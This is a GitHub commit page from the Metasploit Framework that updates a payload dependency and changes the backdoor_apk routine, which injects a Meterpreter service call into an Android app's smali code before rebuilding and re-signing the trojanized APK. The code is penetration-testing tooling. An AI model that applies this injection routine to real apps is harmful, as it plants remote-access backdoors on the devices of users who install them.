Skip to content

Commit 981f318

Browse files
author
Brent Cook
committed
Land rapid7#7847, fix smali code injection for more APKs
2 parents f61314d + d9602f4 commit 981f318

File tree

3 files changed

+14
-10
lines changed

3 files changed

+14
-10
lines changed

Gemfile.lock

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ PATH
1414
metasploit-concern
1515
metasploit-credential
1616
metasploit-model
17-
metasploit-payloads (= 1.2.8)
17+
metasploit-payloads (= 1.2.9)
1818
metasploit_data_models
1919
metasploit_payloads-mettle (= 0.1.6)
2020
msgpack
@@ -169,7 +169,7 @@ GEM
169169
activemodel (~> 4.2.6)
170170
activesupport (~> 4.2.6)
171171
railties (~> 4.2.6)
172-
metasploit-payloads (1.2.8)
172+
metasploit-payloads (1.2.9)
173173
metasploit_data_models (2.0.13)
174174
activerecord (~> 4.2.6)
175175
activesupport (~> 4.2.6)

lib/msf/core/payload/apk.rb

Lines changed: 11 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -198,12 +198,12 @@ def backdoor_apk(apkfile, raw_payload)
198198
end
199199

200200
unless activitysmali
201-
raise RuntimeError, "Unable to find hook point in #{smalifiles}\n"
201+
raise RuntimeError, "Unable to find hookable activity in #{smalifiles}\n"
202202
end
203203

204-
entrypoint = ';->onCreate(Landroid/os/Bundle;)V'
204+
entrypoint = 'return-void'
205205
unless activitysmali.include? entrypoint
206-
raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
206+
raise RuntimeError, "Unable to find hookable function in #{smalifile}\n"
207207
end
208208

209209
# Remove unused files
@@ -226,10 +226,10 @@ def backdoor_apk(apkfile, raw_payload)
226226
File.open(newfilename, "wb") {|file| file.puts newsmali }
227227
end
228228

229-
payloadhook = entrypoint + %Q^
230-
invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
231-
^
232-
hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
229+
payloadhook = %Q^invoke-static {}, L#{package_slash}/MainService;->start()V
230+
231+
^ + entrypoint
232+
hookedsmali = activitysmali.sub(entrypoint, payloadhook)
233233

234234
print_status "Loading #{smalifile} and injecting payload..\n"
235235
File.open(smalifile, "wb") {|file| file.puts hookedsmali }
@@ -241,6 +241,10 @@ def backdoor_apk(apkfile, raw_payload)
241241

242242
print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
243243
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
244+
unless File.readable?(injected_apk)
245+
raise RuntimeError, "Unable to rebuild apk with apktool"
246+
end
247+
244248
print_status "Signing #{injected_apk}\n"
245249
run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")
246250
print_status "Aligning #{injected_apk}\n"

metasploit-framework.gemspec

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
6565
# are needed when there's no database
6666
spec.add_runtime_dependency 'metasploit-model'
6767
# Needed for Meterpreter
68-
spec.add_runtime_dependency 'metasploit-payloads', '1.2.8'
68+
spec.add_runtime_dependency 'metasploit-payloads', '1.2.9'
6969
# Needed for the next-generation POSIX Meterpreter
7070
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.6'
7171
# Needed by msfgui and other rpc components

0 commit comments

Comments
 (0)